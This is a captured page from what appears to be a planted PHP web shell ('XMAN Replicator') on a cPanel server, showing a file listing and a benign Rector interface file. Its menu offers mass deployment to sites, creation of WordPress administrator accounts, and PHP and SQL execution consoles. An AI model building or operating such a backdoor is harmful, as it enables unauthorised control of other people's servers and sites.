🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
opt
/
cpanel
/
ea-wappspector
/
vendor
/
rector
/
rector
/
rules
/
Arguments
/
Contract
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwxr-xr-x
2024-11-08 13:59
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwxr-xr-x
2024-11-08 13:59
🔄
🗑️
🗑️📁
⬇️
🔒
ReplaceArgumentDefaultValueInterface.php
312 B
-rw-r--r--
2024-11-08 13:59
✏️
🔄
🗑️
⬇️
🔒
Edit: ReplaceArgumentDefaultValueInterface.php
<?php declare (strict_types=1); namespace Rector\Arguments\Contract; interface ReplaceArgumentDefaultValueInterface { public function getPosition() : int; /** * @return mixed */ public function getValueBefore(); /** * @return mixed */ public function getValueAfter(); }
Save
PHP Console
Execute
SQL Console
Execute